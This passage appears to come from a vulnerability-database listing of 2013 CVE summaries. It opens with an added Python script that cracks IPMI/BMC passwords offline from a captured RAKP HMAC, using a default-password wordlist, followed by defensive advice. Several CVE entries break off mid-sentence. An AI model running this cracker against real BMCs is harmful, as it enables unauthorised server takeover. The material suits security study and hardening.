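The RAKP weakness in the entry above is a protocol-design issue rather than an implementation bug, and it is easiest to understand by reproducing the attacker's side of it. The following is an added example, not code from the vulscan page, VulDB or IBM. It assumes the IPMI 2.0 RAKP exchange: the client sends RAKP message 1 (its session ID, a 16-byte nonce, a requested role and a username) and the BMC replies with RAKP message 2 carrying HMAC-SHA1, keyed with the user's password, over the concatenation of both session IDs, both nonces, the BMC GUID, the role byte, the username length and the username. Since an unauthenticated client chooses or receives every one of those fields, the HMAC can be attacked offline with a wordlist. All session IDs, nonces, the GUID, the username and the wordlist are constructed; the "captured" HMAC is computed from a constructed password so the example runs without a BMC.

```python
"""Offline dictionary attack against an IPMI 2.0 RAKP message-2 HMAC.

Added example, not code from the vulscan page, VulDB or IBM.  Assumes the
IPMI 2.0 RAKP-HMAC-SHA1 keyed message
    SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULENm || UNAME
keyed with the user's password (Kuid).  All capture data is constructed.
"""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class Rakp2Capture:
    sid_console: bytes        # SIDm: remote console session ID, 4 bytes
    sid_bmc: bytes            # SIDc: managed system session ID, 4 bytes
    rand_console: bytes       # Rm: remote console random number, 16 bytes
    rand_bmc: bytes           # Rc: managed system random number, 16 bytes
    guid_bmc: bytes           # GUIDc: managed system GUID, 16 bytes
    role: int                 # ROLEm: requested privilege level byte from RAKP 1
    username: bytes           # UNAME as sent in RAKP 1
    key_exchange_auth: bytes  # HMAC-SHA1 the BMC returned in RAKP 2

    def keyed_message(self) -> bytes:
        """The exact byte string the BMC authenticated in RAKP message 2."""
        return (self.sid_console + self.sid_bmc + self.rand_console
                + self.rand_bmc + self.guid_bmc + bytes([self.role])
                + bytes([len(self.username)]) + self.username)


def rakp2_hmac(password: bytes, cap: Rakp2Capture) -> bytes:
    """RAKP-HMAC-SHA1 over the keyed message, keyed with the password (Kuid).

    IPMI keeps passwords in a 20-byte zero-padded field.  HMAC zero-pads
    short keys itself, so truncating to 20 bytes is the only
    normalisation needed; padding changes nothing.
    """
    return hmac.new(password[:20], cap.keyed_message(), hashlib.sha1).digest()


def crack_rakp2(cap: Rakp2Capture, wordlist):
    """Return the first candidate whose HMAC matches the capture, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_hmac(candidate, cap), cap.key_exchange_auth):
            return candidate
    return None


def make_demo_capture(password: bytes = b"PASSW0RD") -> Rakp2Capture:
    """Constructed RAKP 2 capture for a constructed BMC password."""
    cap = Rakp2Capture(
        sid_console=bytes.fromhex("a4a3a2a0"),
        sid_bmc=bytes.fromhex("02000000"),
        rand_console=bytes(range(16)),
        rand_bmc=bytes(range(16, 32)),
        guid_bmc=bytes.fromhex("00112233445566778899aabbccddeeff"),
        role=0x14,          # ADMINISTRATOR (4) with the name-only-lookup bit set
        username=b"USERID",
        key_exchange_auth=b"",
    )
    cap.key_exchange_auth = rakp2_hmac(password, cap)
    return cap


if __name__ == "__main__":
    capture = make_demo_capture()
    # constructed wordlist; a real run starts with vendor-default credentials
    words = [b"admin", b"password", b"calvin", b"PASSW0RD", b"changeme"]
    print("recovered password:", crack_rakp2(capture, words))
```

The defensive reading is the same as the offensive one: because the protocol cannot be fixed without breaking interoperability, the only controls are long random BMC passwords, removal of default accounts such as the one in CVE-2013-4031 above, and keeping the IPMI/LAN interface off any network an attacker can reach.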
[CVE-2013-4031] The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers has a default password for the IPMI user account, which makes it easier for remote attackers to perform power-on, power-off, or reboot actions, or add or modify accounts, via unspecified vectors.
[CVE-2013-3999] Cross-site scripting (XSS) vulnerability in IBM Social Media Analytics 1.2 before FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3996] IBM InfoSphere BigInsights 1.1 through 2.1 does not properly handle FRAME elements, which makes it easier for remote authenticated users to conduct phishing attacks via a crafted web site.
[CVE-2013-3995] Cross-site scripting (XSS) vulnerability in IBM InfoSphere BigInsights 1.1 through 2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3990] Cross-site scripting (XSS) vulnerability in the MIME e-mail functionality in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR PTHN98FLQ2.
[CVE-2013-3979] Multiple cross-site scripting (XSS) vulnerabilities in the help pages in Web\Content\Help\ in the Web Client in IBM Cognos Command Center (aka Star Command Center or Star Analytics) before 10.1, when Internet Explorer is used, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3959] The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, exhibits different behavior for NetBIOS user names depending on whether the user account exists, which allows remote authenticated users to enumerate account names via crafted URL parameters.
[CVE-2013-3958] The login implementation in the Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, has a hardcoded account, which makes it easier for remote attackers to obtain access via an unspecified request.
[CVE-2013-3957] SQL injection vulnerability in the login screen in the Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2013-3822] Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS).
[CVE-2013-3791] Unspecified vulnerability in Enterprise Manager (EM) Base Platform 10.2.0.5 and EM DB Control 11.1.0.7 in Oracle Enterprise Manager Grid Control allows remote attackers to affect integrity via unknown vectors related to User Interface Framework.
[CVE-2013-3782] Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization 4.6 prior to 4.63 and 4.7 prior to 4.71 allows remote attackers to affect integrity via unknown vectors related to Web UI.
[CVE-2013-3779] Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization All 4.6 releases including 4.63 and 4.7 prior to 4.71 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI.
[CVE-2013-3772] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Web Forms.
[CVE-2013-3770] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Content Server.
[CVE-2013-3769] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Site Studio.
[CVE-2013-3742] Cross-site scripting (XSS) vulnerability in view_create.php (aka the Create View page) in phpMyAdmin 4.x before 4.0.3 allows remote authenticated users to inject arbitrary web script or HTML via an invalid SQL CREATE VIEW statement with a crafted name that triggers an error message.
[CVE-2013-3735] ** DISPUTED ** The Zend Engine in PHP before 5.4.16 RC1, and 5.5.0 before RC2, does not properly determine whether a parser error occurred, which allows context-dependent attackers to cause a denial of service (memory consumption and application crash) via a crafted function definition, as demonstrated by an attack within a shared web-hosting environment. NOTE: the vendor's http://php.net/security-note.php page says "for critical security situations you should be using OS-level security by running multiple web servers each as their own user id."
[CVE-2013-3720] Cross-site scripting (XSS) vulnerability in widget_remove.php in the Feedweb plugin before 1.9 for WordPress allows remote authenticated administrators to inject arbitrary web script or HTML via the wp_post_id parameter.
[CVE-2013-3719] Cross-site scripting (XSS) vulnerability in the aiContactSafe component before 2.0.21 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3653] Multiple cross-site scripting (XSS) vulnerabilities in the RecommendSearch feature in the management screen in LOCKON EC-CUBE before 2.12.5 allow remote attackers to inject arbitrary web script or HTML via vectors involving the rank parameter, a different vulnerability than CVE-2013-3652.
[CVE-2013-3652] Cross-site scripting (XSS) vulnerability in data/class/pages/products/LC_Page_Products_List.php in LOCKON EC-CUBE 2.11.0 through 2.12.4 allows remote attackers to inject arbitrary web script or HTML via vectors involving the classcategory_id2 field, a different vulnerability than CVE-2013-3653.
[CVE-2013-3649] Cross-site scripting (XSS) vulnerability in KENT-WEB CLIP-MAIL before 3.4, when Internet Explorer 7 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an unspecified form field.
[CVE-2013-3648] Cross-site scripting (XSS) vulnerability in KENT-WEB POST-MAIL before 6.7, when Internet Explorer 7 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an unspecified form field.
[CVE-2013-3647] The WebView class in the Cybozu Live application before 2.0.1 for Android allows attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL. NOTE: this vulnerability exists because of a CVE-2012-4009 regression.
[CVE-2013-3646] The Cybozu Live application before 2.0.1 for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site. NOTE: this vulnerability exists because of a CVE-2012-4008 regression.
[CVE-2013-3645] Cross-site scripting (XSS) vulnerability in the Orchard.Comments module in Orchard before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3643] The Galapagos Browser application for Android does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.
[CVE-2013-3642] The Angel Browser application 1.47b and earlier for Android 1.6 through 2.1, 1.62b and earlier for Android 2.2 through 2.3.4, 1.68b and earlier for Android 3.0 through 4.0.3, and 1.76b and earlier for Android 4.1 through 4.2 does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.
[CVE-2013-3640] Cross-site scripting (XSS) vulnerability in the Instant Web Publish function in FileMaker Pro before 12 and Pro Advanced before 12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3562] Multiple integer signedness errors in the tvb_unmasked function in epan/dissectors/packet-websocket.c in the Websocket dissector in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (application crash) via a malformed packet.
[CVE-2013-3561] Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (loop or application crash) via a malformed packet, related to a crash of the Websocket dissector, an infinite loop in the MySQL dissector, and a large loop in the ETCH dissector.
[CVE-2013-3538] Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php in Todoo Forum 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id_post or (2) pg parameter.
[CVE-2013-3535] Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 and 1.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) admin_email, (2) header_title, (3) site_title parameter to admin/settings
[CVE-2013-3534] Cross-site scripting (XSS) vulnerability in the aiContactSafe component before 2.0.21 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3532] SQL injection vulnerability in settings.php in the Web Dorado Spider Video Player plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the theme parameter.
[CVE-2013-3529] Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php in the WP FuneralPress plugin before 1.1.7 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) message, (2) photo-message, or (3) youtube-message parameter.
[CVE-2013-3526] Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.
[CVE-2013-3515] Multiple cross-site scripting (XSS) vulnerabilities in OpenX Source 2.8.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) package parameter to www/admin/plugin-index.php or the (2) group parameter to www/admin/plugin-settings.php.
[CVE-2013-3511] Open redirect vulnerability in the NeDi component in GroundWork Monitor Enterprise 6.7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2013-3501] Multiple cross-site scripting (XSS) vulnerabilities in GroundWork Monitor Enterprise 6.7.0 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the foundation-webapp/admin/ directory, (2) the NeDi component, or (3) the Noma component.
[CVE-2013-3498] Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN Security Management before 7.7 MR3 and 8.0 before MR2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3450] Cross-site request forgery (CSRF) vulnerability in the User WebDialer page in Cisco Unified Communications Manager (Unified CM) allows remote attackers to hijack the authentication of arbitrary users for requests that dial calls, aka Bug ID CSCui13028.
[CVE-2013-3448] Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315.
[CVE-2013-3444] The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1
[CVE-2013-3443] The web service framework in Cisco WAAS Software 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 in a Central Manager (CM) configuration allows remote attackers to execute arbitrary code via a crafted POST request, aka Bug ID CSCuh26626.
[CVE-2013-3442] The web portal in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive stack-trace information via unspecified vectors that trigger a stack exception, aka Bug ID CSCug34854.
[CVE-2013-3439] Cross-site scripting (XSS) vulnerability in Cisco Unified Operations Manager allows remote attackers to inject arbitrary web script or HTML via a crafted URL in an unspecified HTTP header field, aka Bug ID CSCud80182.
[CVE-2013-3438] The web framework in the server in Cisco Unified MeetingPlace Web Conferencing allows remote attackers to bypass intended access restrictions and read unspecified web pages via crafted parameters, aka Bug ID CSCuh86385.
[CVE-2013-3425] The Meeting Center component in Cisco WebEx 11 generates different error messages for invalid file-access attempts depending on whether a file exists, which allows remote authenticated users to enumerate files via a series of SPI calls, aka Bug ID CSCuc35965.
[CVE-2013-3422] Cross-site scripting (XSS) vulnerability in Administration pages in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud75165.
[CVE-2013-3421] Cross-site scripting (XSS) vulnerability in the Help index page in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud75170.
[CVE-2013-3420] Cross-site request forgery (CSRF) vulnerability in the web framework on the Cisco Identity Services Engine (ISE) allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuh25506.
[CVE-2013-3419] Cross-site scripting (XSS) vulnerability in Cisco Unified MeetingPlace Web Conferencing allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCuh74981.
[CVE-2013-3418] Cisco Unified Communications Domain Manager does not properly allocate memory for GET and POST requests, which allows remote authenticated users to cause a denial of service (memory consumption and process crash) via crafted requests to the management interface, aka Bug ID CSCud22922.
[CVE-2013-3416] Cross-site scripting (XSS) vulnerability in the web framework in the unified-communications management implementation in Cisco Unified Operations Manager and Unified Service Monitor allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug IDs CSCuh47574 and CSCuh95997.
[CVE-2013-3414] Cross-site scripting (XSS) vulnerability in the WebVPN portal login page on Cisco Adaptive Security Appliances (ASA) devices allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCug83080.
[CVE-2013-3413] Cross-site scripting (XSS) vulnerability in the search form in the administration/monitoring panel on the Cisco Identity Services Engine (ISE) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCuh87036.
[CVE-2013-3405] The web portal in TC software on Cisco TelePresence endpoints does not require an exact password match during a login attempt by a user who has not configured a password, which allows remote attackers to bypass authentication by sending an arbitrary password, aka Bug ID CSCud96071.
[CVE-2013-3398] The web framework in Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance provides different responses to requests for arbitrary pathnames depending on whether the pathname exists, which allows remote attackers to enumerate directories and files via a series of crafted requests, aka Bug ID CSCuh64574.
[CVE-2013-3396] Cross-site scripting (XSS) vulnerability in the web framework in Cisco Content Security Management on Security Management Appliance (SMA) devices allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCuh24749.
[CVE-2013-3395] Cross-site request forgery (CSRF) vulnerability in the web framework on Cisco IronPort Web Security Appliance (WSA) devices, Email Security Appliance (ESA) devices, and Content Security Management Appliance (SMA) devices allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCuh70263, CSCuh70323, and CSCuh26634.
[CVE-2013-3392] Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco WebEx Social allow remote attackers to hijack the authentication of arbitrary users via unspecified vectors, aka Bug IDs CSCuh10405 and CSCuh10355.
[CVE-2013-3386] The IronPort Spam Quarantine (ISQ) component in the web framework in IronPort AsyncOS on Cisco Email Security Appliance devices before 7.1.5-106 and 7.3, 7.5, and 7.6 before 7.6.3-019 and Content Security Management Appliance devices before 7.9.1-102 and 8.0 before 8.0.0-404 allows remote attackers to cause a denial of service (service crash or hang) via a high rate of TCP connection attempts, aka Bug IDs CSCzv25573 and CSCzv81712.
[CVE-2013-3385] The management GUI in the web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-602
[CVE-2013-3384] The web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-550
[CVE-2013-3383] The web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-550 allows remote authenticated users to execute arbitrary commands via crafted command-line input in a URL sent over IPv4, aka Bug ID CSCzv69294.
[CVE-2013-3376] Open redirect vulnerability in the help page in Cisco Video Surveillance Operations Manager allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka Bug ID CSCty74490.
[CVE-2013-3375] Cross-site scripting (XSS) vulnerability in the portal page in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCue23798.
[CVE-2013-3350] Adobe ColdFusion 10 before Update 11 allows remote attackers to call ColdFusion Components (CFC) public methods via WebSockets.
[CVE-2013-3275] EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store Gen3, Gen4, and Gen4s platforms do not properly restrict use of FRAME elements, which makes it easier for remote attackers to obtain sensitive information via a crafted web site, related to "cross frame scripting vulnerabilities."
[CVE-2013-3267] Cross-site scripting (XSS) vulnerability in the highlighter plugin in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3262] Cross-site scripting (XSS) vulnerability in admin/admin.php in the Download Monitor plugin before 3.3.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the p parameter.
[CVE-2013-3261] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the GRAND FlAGallery plugin before 2.72 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter in a flag-manage-gallery action.
[CVE-2013-3254] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the WP Photo Album Plus plugin before 5.0.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the commentid parameter in a wppa_manage_comments edit action.
[CVE-2013-3210] Opera before 12.15 does not properly block top-level domains in Set-Cookie headers, which allows remote attackers to obtain sensitive information by leveraging control of a different web site in the same top-level domain.
[CVE-2013-3166] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to inject arbitrary web script or HTML via vectors involving incorrect auto-selection of the Shift JIS encoding, leading to cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability," a different vulnerability than CVE-2013-0015.
[CVE-2013-3164] Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
[CVE-2013-3163] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3151.
[CVE-2013-3162] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3115.
[CVE-2013-3161] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3143.
[CVE-2013-3153] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3148.
[CVE-2013-3152] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3146.
[CVE-2013-3151] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3163.
[CVE-2013-3150] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3145.
[CVE-2013-3149] Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
[CVE-2013-3148] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3153.
[CVE-2013-3147] Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
[CVE-2013-3146] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3152.
[CVE-2013-3145] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3150.
[CVE-2013-3144] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3151 and CVE-2013-3163.
[CVE-2013-3143] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3161.
[CVE-2013-3142] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3139.
[CVE-2013-3141] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3110.
[CVE-2013-3139] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3142.
[CVE-2013-3126] Microsoft Internet Explorer 9 and 10, when script debugging is enabled, does not properly handle objects in memory during the processing of script, which allows remote attackers to execute arbitrary code via a crafted web site, aka "Internet Explorer Script Debug Vulnerability."
[CVE-2013-3125] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3120.
[CVE-2013-3124] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3122.
[CVE-2013-3123] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3111.
[CVE-2013-3122] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3124.
[CVE-2013-3121] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3139, and CVE-2013-3142.
[CVE-2013-3120] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3125.
[CVE-2013-3119] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3114.
[CVE-2013-3118] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3120 and CVE-2013-3125.
[CVE-2013-3117] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3122 and CVE-2013-3124.
[CVE-2013-3116] Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
[CVE-2013-3115] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3162.
[CVE-2013-3114] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3119.
[CVE-2013-3113] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142.
[CVE-2013-3112] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3113, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142.
[CVE-2013-3111] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123.
[CVE-2013-3110] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3141.
[CVE-2013-3079] VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remote authenticated users to execute arbitrary programs with root privileges by leveraging Virtual Appliance Management Interface (VAMI) access.
[CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
[CVE-2013-3059] Cross-site scripting (XSS) vulnerability in the Voting plugin in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3058] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-3055] Lexmark Markvision Enterprise before 1.8 provides a diagnostic interface on TCP port 9789, which allows remote attackers to execute arbitrary code, change the configuration, or obtain sensitive fleet-management information via unspecified vectors.
[CVE-2013-3035] The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allows remote attackers to cause a denial of service (system hang) via a crafted packet to an IPv6 interface.
[CVE-2013-3032] Cross-site scripting (XSS) vulnerability in the MIME e-mail functionality in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR PTHN986NAA.
[CVE-2013-3028] Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x before 7.0.1.11, 7.1.x before 7.1.0.3, and 7.5.x before 7.5.0.2 on non-Windows platforms allow local users to gain privileges via unspecified vectors.
[CVE-2013-3027] Integer overflow in the DWA9W ActiveX control in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to execute arbitrary code via a crafted web page, aka SPR PTHN97XHFW.
